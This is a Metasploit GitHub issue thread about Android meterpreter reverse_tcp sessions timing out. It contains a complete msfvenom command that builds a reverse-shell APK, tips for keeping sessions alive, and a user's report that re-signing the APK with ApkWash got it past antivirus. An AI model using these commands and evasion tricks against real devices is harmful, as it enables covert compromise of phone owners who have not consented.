### ISSUE TITLE
Meterpreter sessions just work for a while.

### ISSUE THREAD

**Issue by g4biru** [rapid7/metasploit-framework#11065]
Hello,

 I used a android/meterpreter/reverse_tcp payload in a Android 8.1 and it works but when I type some command (sysinfo for exemple) shortly after starting the session it works. But few seconds later i receive a Rex:TimeOut message.   

## Expected behavior

Meterpreter sessions must work indefinitely.

## Current behavior

Meterpreter sessions just work a few seconds.

### Metasploit version
v4.17

### I installed Metasploit with:
- [x] Kali package via apt

### OS

Kali

**Comment by timwr** [comment]
Does `meterpreter > wakelock` help at all? It's difficult to have a meterpreter session running indefinitely on Android (especially when on 4g/battery) but that command may help on more recent devices.
There is also a payload option that does the same thing, e.g: `msfvenom -p android/meterpreter/reverse_tcp AndroidWakelock=true LHOST=127.0.0.1 LPORT=4444 -o out.apk`
If it helps we should make it on by default. (I think it only caused problems on an older samsung device).

**Comment by g4biru** [comment]
> Does `meterpreter > wakelock` help at all? It's difficult to have a meterpreter session running indefinitely on Android (especially when on 4g/battery) but that command may help on more recent devices.
> There is also a payload option that does the same thing, e.g: `msfvenom -p android/meterpreter/reverse_tcp AndroidWakelock=true LHOST=127.0.0.1 LPORT=4444 -o out.apk`
> If it helps we should make it on by default. (I think it only caused problems on an older samsung device).

Wow, it's a very good trick to use this command. But the sessions continue to die after 3 ~ 5 seconds. A friend told me it's because the AV cuts off the connection, and the only way to solve this problem is to assign the APK using ApkWash, for example. I'll try now and give you feedback on that.

**Comment by g4biru** [comment]
Guys,

I solved the problem just assigning the apk with APKWASH. That's all.

**Comment by timwr** [comment]
Now I'm confused, apkwash uses msfvenom:
 https://github.com/jbreed/apkwash/blob/master/apkwash

**Comment by g4biru** [comment]
Yeah, but when you create a payload with apkwash, you assign too. And I don't know why, but the AV doesn't stop the apk anymore.
